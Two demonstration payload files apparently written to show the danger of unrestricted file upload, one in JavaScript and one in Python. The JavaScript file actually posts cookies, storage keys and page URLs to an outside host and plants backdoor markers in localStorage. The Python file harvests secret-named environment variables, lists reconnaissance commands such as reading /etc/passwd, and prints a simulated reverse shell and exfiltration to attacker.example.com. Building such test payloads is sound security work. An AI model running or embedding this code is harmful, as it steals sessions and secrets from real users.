File: listener/payload/reverse_shell.js
// Reverse Shell Payload - FOR TESTING PURPOSES ONLY
// This simulates a reverse shell payload that would execute when uploaded

console.log("Reverse shell payload executed!");

// Simulate system information gathering
const systemInfo = {
  userAgent: navigator.userAgent,
  platform: navigator.platform,
  language: navigator.language,
  cookieEnabled: navigator.cookieEnabled,
  onLine: navigator.onLine
};

console.log("System Information:", systemInfo);

// Simulate data exfiltration
const sensitiveData = {
  localStorage: Object.keys(localStorage),
  sessionStorage: Object.keys(sessionStorage),
  cookies: document.cookie,
  currentUrl: window.location.href,
  referrer: document.referrer
};

console.log("Sensitive data collected:", sensitiveData);

// Simulate network communication
fetch('https://httpbin.org/post', {
  method: 'POST',
  headers: {
    'Content-Type': 'application/json',
  },
  body: JSON.stringify({
    type: 'exfiltrated_data',
    timestamp: new Date().toISOString(),
    data: sensitiveData
  })
}).then(response => {
  console.log('Data sent to attacker server');
}).catch(error => {
  console.log('Network communication failed:', error);
});

// Simulate persistent access
try {
  // Store backdoor in localStorage
  localStorage.setItem('backdoor_active', 'true');
  localStorage.setItem('backdoor_timestamp', new Date().toISOString());
  
  console.log("Backdoor established for persistent access");
} catch (error) {
  console.log("Backdoor setup failed:", error);
}

// Alert to show successful execution
alert("🚨 VULNERABLE FILE EXECUTED! 🚨\n\nThis demonstrates a critical security flaw:\n- Arbitrary JavaScript execution\n- No input validation\n- Direct file execution\n\nCheck console for 'attack' details.");

File: listener/payload/reverse_shell.py
# Python Reverse Shell Payload - FOR SECURITY RESEARCH ONLY
import subprocess
import socket
import os
import sys
import platform
import json
from datetime import datetime

print("🚨 PYTHON REVERSE SHELL PAYLOAD EXECUTED 🚨")

# System information gathering
def gather_system_info():
    info = {
        "timestamp": datetime.now().isoformat(),
        "platform": platform.platform(),
        "system": platform.system(),
        "processor": platform.processor(),
        "python_version": sys.version,
        "current_directory": os.getcwd(),
        "user": os.getlogin() if hasattr(os, 'getlogin') else 'unknown',
        "environment_vars": {k: v for k, v in os.environ.items() if any(secret in k.upper() for secret in ['PASSWORD', 'SECRET', 'KEY', 'TOKEN'])}
    }
    return info

# Simulate reverse shell connection
def simulate_reverse_shell():
    print("=== ATTEMPTING REVERSE SHELL CONNECTION ===")
    print("Target: attacker.example.com:4444")
    
    # This would normally establish a real connection
    print("Connection attempt 1: TCP socket")
    print("Connection attempt 2: HTTP tunnel") 
    print("Connection attempt 3: DNS tunneling")
    
    print("Reverse shell established! (simulated)")

# Simulate command execution
def execute_commands():
    dangerous_commands = [
        "whoami",
        "pwd",
        "ls -la /",
        "cat /etc/passwd",
        "ps aux",
        "netstat -tulpn",
        "find / -name '*.config' 2>/dev/null",
        "history"
    ]
    
    print("=== EXECUTING SYSTEM COMMANDS ===")
    for cmd in dangerous_commands:
        print(f"Executing: {cmd}")
        try:
            # In a real attack, this would execute actual commands
            # result = subprocess.check_output(cmd, shell=True, text=True)
            print(f"[SIMULATED] Command output for: {cmd}")
        except Exception as e:
            print(f"Command failed: {e}")

# Data exfiltration simulation
def exfiltrate_data():
    print("=== DATA EXFILTRATION ===")
    
    system_info = gather_system_info()
    print("Collected system information:")
    print(json.dumps(system_info, indent=2))
    
    # Simulate sending data to attacker server
    print("Sending data to attacker server...")
    print("POST https://attacker.example.com/collect")
    print("Data transmission complete (simulated)")

# Persistence mechanism
def establish_persistence():
    print("=== ESTABLISHING PERSISTENCE ===")
    
    # Simulate creating persistent backdoor
    print("Creating startup script...")
    print("Modifying system services...")
    print("Installing rootkit components...")
    print("Persistence established (simulated)")

if __name__ == "__main__":
    print(f"Payload started at: {datetime.now()}")
    
    try:
        gather_system_info()
        simulate_reverse_shell()
        execute_commands()
        exfiltrate_data() 
        establish_persistence()
        
        print("\n🔥 CRITICAL VULNERABILITY DEMONSTRATED 🔥")
        print("This payload shows how uploaded Python files can:")
        print("- Execute arbitrary system commands")
        print("- Gather sensitive system information")
        print("- Establish reverse shell connections")
        print("- Exfiltrate data to external servers")
        print("- Create persistent backdoor access")
        print("\nVulnerability: Unrestricted file upload + execution")
        
    except Exception as e:
        print(f"Payload execution error: {e}")
    
    print("Payload execution complete")